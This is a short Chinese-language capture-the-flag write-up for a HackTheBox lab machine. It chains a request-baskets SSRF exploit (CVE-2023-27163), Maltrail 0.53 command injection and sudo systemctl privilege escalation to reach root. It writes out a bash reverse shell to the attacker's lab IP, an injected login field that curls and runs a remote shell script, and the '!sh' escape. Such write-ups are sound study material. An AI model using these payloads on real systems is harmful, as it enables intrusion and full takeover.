一 信息搜集
1.目录扫描
sudo nmap -sS -sV -A 10.10.11.224
二.漏洞利用
扫描出来的端口就只有5555可以访问,看到request baskets 这个信息,在GitHub上搜索一下有什么漏洞(hackthebox上的机器就是这这样搜索信息,然后去找web漏洞),直接在GitHub上下载exp,然后拿过来运行
在这里 原本80端口是不可以访问的,这里使用exp,这可以在原本80端口的页面转发到10.10.11.224:55555/vukobn这里,访问即可
./CVE-2023-27163.sh http://10.10.11.224:55555/ http://10.10.14.128:80/
有许多点击处,但是点击不了,手动输入login试试
三 反弹shell
出现界面,这里看到右下角关键信息,又给了一个版本信息,直接github接着搜就行
找到漏洞链接,另起终端监听,下载好poc直接运行试试 ,这里攻击的就是那个login界面,只要确保后面那个链接是login的就行,以你们自己的为主。但是这里一直反弹不了,看看poc怎么写的。看到是" `paylaod` "。这里的反引号就是Linux中一个规则,在反引号中的字符都会当成bash命令去执行例如"ifconfig",双引号那就解释成一个单词,字符串 。`ifocnfig`就会执行这个命令。既然直接反弹不了,那么就远程下载一个bash反弹再执行
https://github.com/spookier/Maltrail-v0.53-Exploit/blob/main/exploit.py
这里我再把80端口的界面显示再10.10.11.224 :55555vdywiu界面上 ,这一步可以不要其实
起一个小型服务器,将一个反弹shell写入shell.sh 文件
bash -i >& /dev/tcp/10.10.14.128/4444 0>&1
将那个login界面抓包然后构造如下数据包,POST提交,数据部分就是poc内容只是要进行url编码。在进行编码即可,注意这里还要加上Content-Type这个字段,
username=;`curl 10.10.14.128/shell.sh|bash`
四 提权
发送即可得到shell,拿到先进行 sudo -l 直接出货,看到这里有/url/bin/systemctl,这就是提权思路
在这上面看一个思路,sudo运行后直接!sh 就可以提权成功
但是这里有一个痛点,就是有时候是无法稳定交互的,那就运行python得到稳定的一个终端
python3 -c 'import pty;pty.spawn("/bin/bash")'
最后得到root权限,拿到flag